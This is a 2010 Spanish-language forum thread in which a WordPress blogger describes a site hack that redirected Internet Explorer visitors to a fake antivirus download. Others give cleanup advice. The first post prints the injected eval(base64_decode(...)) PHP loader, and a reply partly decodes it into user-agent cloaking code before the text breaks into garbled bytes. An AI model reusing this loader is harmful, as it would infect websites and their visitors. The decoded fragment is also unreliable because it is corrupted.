No estás registrado (Registrarse)

Vanilla 1.1.10 es un producto de Lussumo. Para más información: Documentación, Soporte.

    •  
      CommentAuthoresteflaco
    • CommentTimeApr 28th 2010 editado
     # 1
    Amigos demenitas , me gustaria saber si alguno de ustedes en su carrera dominera o desarrolladora je je , a tenido un ataque a alguno de sus blogs en wordpres , es que note algo extraño en un blog ,cuando abria la web con firefox todo parecia normal , pero cuando abria la pagina con explorer despues de un rato de estar en mi blog me redirigia a una web para descargar un sofware antiviruz o algo asi.

    me puse a revisar el codigo php del wordpres , los html que tenia y uno que otro php mio y me llevo la sorpresa que arriba antes de comenzar una sentencia <?php tenian pegado este codigo :
    <blockquote>
    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8
    nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3
    RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgI
    CByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCO
    DFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>

    </blockquote>

    No tengo la mas minima idea de que signifique , ya lo borre manualmente de los documentos php implicados , actualize el wordpres y cambie la passwd del ftp del host.

    alguno de ustedes a vivido exta terrible expereincia ??

    Gracias a ese bicho mis ingresos en adsense se redujeron a la mitad por unos buenos dias ... disculpen la ortografia o si escribi algo mal ya no puedo con el sueño je je , pero queria salir de esta duda cuanto antes .... muchas gracias por su respuesta :typeo: Suplementos deportivos proteinas , creatinas , suplementos musculacion
    •  
      CommentAuthorroot78
    • CommentTimeApr 28th 2010
     # 2
    ¿Qué versión WP tenías instalada? Suelen ser las conocidas inyecciones SQL y te deja ko la gran mayoría de webs si tienes multidominio. Existen algunos scripts que se usan como bots para detectar vulnerabilidades en wp y atacar automáticamente. Ya se habló de este tema por aquí hace unos meses. Es muy costoso si no tienes un backup a mano,pues te obliga a lo que has hecho: revisar código,borrar código,cambiar ftp e incluso el pass de panel del admistración. Revisa localmente tu ordenador y también la base de datos. A veces, se introducen nuevos administradores como usuarios.La Curiosidad es el Principio de toda Filosofía.
    •  
      CommentAuthorMarc
    • CommentTimeApr 28th 2010 editado
     # 3
    Revisa con un software antivirus/antispyware tu PC, suelen usar programas para infectarlo, conseguir las claves del FTP y luego modificar el código de los archivos html desde múltiples IPs distintas, revisando los logs normalmente se detecta rápidamente. Normalmente bastará con que cambies el pass del FTP tras limpiar tu PC y subas de nuevo la copia que tengas guardada en local.
    Si tras un tiempo la web sigue con el mismo problema, google puede marcar tu web como peligrosa e indicarlo mediante un mensaje muy molesto a tus visitantes, las visitas a la web disminuirían drásticamente. SuerteDomaining...! Te ayudo con la gestión de tus dominios en INWX España
    •  
      CommentAuthorSimbionte
    • CommentTimeApr 28th 2010
     # 4
    Es un código cifrado, con un poco de paciencia puedes descifrarlo y sacar el código real. Yo no estoy muy puesto en el tema pero hablaría mas se spyware si que de un virus.Metro Barcelona
    •  
      CommentAuthorSimbionte
    • CommentTimeApr 28th 2010 editado
     # 5
    No controlo mucho de esto tampoco, pero parece que tiene una doble codificación, se queda en algo asi;
    if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1;
    if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){
    if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&
    (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
    return base64_decode("PHNjcmlwdt#S?3S#?DR?²ÖVÇ6W²
    &WGW&âE$s?$C4t#?S#?33c?ct#S?3S#?DRævÖÂ??²
    ÒÒö%÷7F'B?v×&ö&?r?²Ò
    Metro Barcelona
    •  
      CommentAuthoresteflaco
    • CommentTimeApr 28th 2010
     # 6
    mmm ok muchachos muchas gracias por sus respuestas , tenia la version 2.8 del wordpress , y aunque me toco tirarme como 4 hora limpiando archivo por archivo , ya todo parece estar normalito, porque sera que abra tanto hp jodiendole la vida a los demas .....

    en fin , todo es experiencia, ya aprendi algo pa la proxima , Gracias a root78 ,darkaos , simbionte por su colaboracion :typeo: Suplementos deportivos proteinas , creatinas , suplementos musculacion
    •  
      CommentAuthoresteflaco
    • CommentTimeMay 2nd 2010 editado
     # 7
    El nombre del bicho ese que me ataco el blog es Ninoplas Base64 , alguien conoce alguna forma de evitar esas molestas inyecciones SQL o algun pluggin o software que ayude a evitar eso ?? , Suplementos deportivos proteinas , creatinas , suplementos musculacion
    •  
      CommentAuthorCorso
    • CommentTimeMay 2nd 2010
     # 8
    •  
      CommentAuthoresteflaco
    • CommentTimeMay 2nd 2010
     # 9
    Gracias corso :typeo: Suplementos deportivos proteinas , creatinas , suplementos musculacion
    •  
      CommentAuthorroot78
    • CommentTimeMay 2nd 2010
     # 10
    ¿no estás alojado en GoDaddy? acabo de leer que blogs en WP y otros scripts alojados en el server han sufrido dos ataques consecutivos esta semana, el último fue ayer mismo.La Curiosidad es el Principio de toda Filosofía.
    •  
      CommentAuthoresteflaco
    • CommentTimeMay 2nd 2010
     # 11
    mmmm siiiii estaba en godaddy , gopapi :smash: Suplementos deportivos proteinas , creatinas , suplementos musculacion
    •  
      CommentAuthoresteflaco
    • CommentTimeMay 17th 2010
     # 12
    Amgos demenitas aqui esta la solucion para ese problema , despues de varios dias , subi el fichero al servidor lo ejecute y listo , aqui el link con l solucion :
    http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html Suplementos deportivos proteinas , creatinas , suplementos musculacion